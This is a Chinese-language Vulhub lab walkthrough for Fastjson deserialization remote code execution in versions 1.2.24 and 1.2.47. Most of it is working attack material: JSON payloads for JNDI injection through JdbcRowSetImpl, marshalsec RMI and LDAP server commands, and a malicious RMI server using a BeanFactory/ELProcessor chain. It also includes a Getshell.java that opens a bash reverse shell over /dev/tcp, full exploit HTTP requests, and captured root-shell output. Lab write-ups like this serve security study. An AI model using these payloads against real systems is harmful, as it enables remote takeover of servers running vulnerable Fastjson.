Vulhub 漏洞学习之：Fastjson

Vulhub 漏洞学习之：Fastjson
- 0 背景知识
  - 0.1 FastJson POC解析
- 1 Fastjson 反序列化导致任意命令执行漏洞

0 背景知识

FastJson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

0.1 FastJson POC解析

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit",""autoCommit":true}

注：因为jndi注入的利用受jdk版本影响较大，所以在利用的时候还是要多尝试的，可通过dnslog先确定一下漏洞是否存在。

0.1.1 基于rmi的利用方式

适用jdk版本：JDK 6u132, JDK 7u122, JDK 8u113之前。

利用方式：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServerhttp://127.0.0.1:8080/test/#Exploit

0.1.2 基于ldap的利用方式

适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前。

利用方式：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServerhttp://127.0.0.1:8080/test/#Exploitt

0.1.3 基于BeanFactory的利用方式

适用jdk版本：JDK 11.0.1、8u191、7u201、6u211以后。

利用前提：因为这个利用方式需要借助服务器本地的类，而这个类在tomcat的jar包里面，一般情况下只能在tomcat上可以利用成功。

利用方式：

public class EvilRMIServerNew {

    public static void main(String[] args) throws Exception {

        System.out.println("Creating evil RMI registry on port 1097");

        Registry registry = LocateRegistry.createRegistry(1097);

        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory

        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);

        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code

        ref.add(new StringRefAddr("forceString", "x=eval"));

        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows

        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','open /Applications/Calculator.app/']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);

        registry.bind("Object", referenceWrapper);

    }

}

1 Fastjson 反序列化导致任意命令执行漏洞

Fastjson允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名。Fastjson自定义的反序列化机制时会自动调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意利用的逻辑，则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中，利用其缓存机制可实现对未开启autotype功能的绕过。

1.1 环境安装

EXP下载并打包：marshalsec改造篇-加入dubbo-hessian2 exploit - 先知社区 (aliyun.com)

1.2 漏洞利用过程

首先编译并上传命令执行代码，将Getshell.java编译生成Getshell.class类：如http://YourIP/Getshell.class：

// Getshell.java

import java.lang.Runtime;

import java.lang.Process;

public class Getshell {

    static {

        try {

            Runtime rt = Runtime.getRuntime();

            String[] commands = {"bash", "-c", "bash -i>& /dev/tcp/192.168.210.10/2333 0>&1"};

            Process pc = rt.exec(commands);

            pc.waitFor();

        } catch (Exception e) {

            // do nothing

        }

    }

}

// 编译Getshell.java得到Getshell.class

javac Getshell.java

打包好的EXP，启动一个RMI服务器，监听9999端口，并制定加载远程类Getshell.class：

java -cp target\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.210.10/#Getshell" 9999

* Opening JRMP listener on 9999

远程VPS（192.168.210.10）监听2333端口

$ nc -nvlp 2333

listening on [any] 2333 ...

1.3 Fastjson 1.2.24 GetShell

因为目标环境是Java 8u102，没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链，借助JNDI注入来执行命令。

向目标靶机发送Payload

POST / HTTP/1.1

Host: 192.168.210.13:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 159

{

   "b":{

       "@type":"com.sun.rowset.JdbcRowSetImpl",

       "dataSourceName":"rmi://192.168.210.10:9999/Getshell",

       "autoCommit":true

    }

}

成功getshell

nc -nvlp 2333

listening on [any] 2333 ...

connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 32906

bash: cannot set terminal process group (1): Inappropriate ioctl for device

bash: no job control in this shell

root@f01ec0f18266:/# id

id

uid=0(root) gid=0(root) groups=0(root)

1.4 Fastjson 1.2.47 Getshell

fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。
目标环境是openjdk:8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以简单利用RMI进行命令执行。

向目标靶机发送Payload

POST / HTTP/1.1

Host: 192.168.210.13:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 257

{

"a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

   "b":{

       "@type":"com.sun.rowset.JdbcRowSetImpl",

       "dataSourceName":"rmi://192.168.210.10:9999/Getshell",

       "autoCommit":true

    }

}

成功Getshell

$ nc -nvlp 2333

listening on [any] 2333 ...

connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 32906

bash: cannot set terminal process group (1): Inappropriate ioctl for device

bash: no job control in this shell

root@886933ecdafe:/# id

id

uid=0(root) gid=0(root) groups=0(root)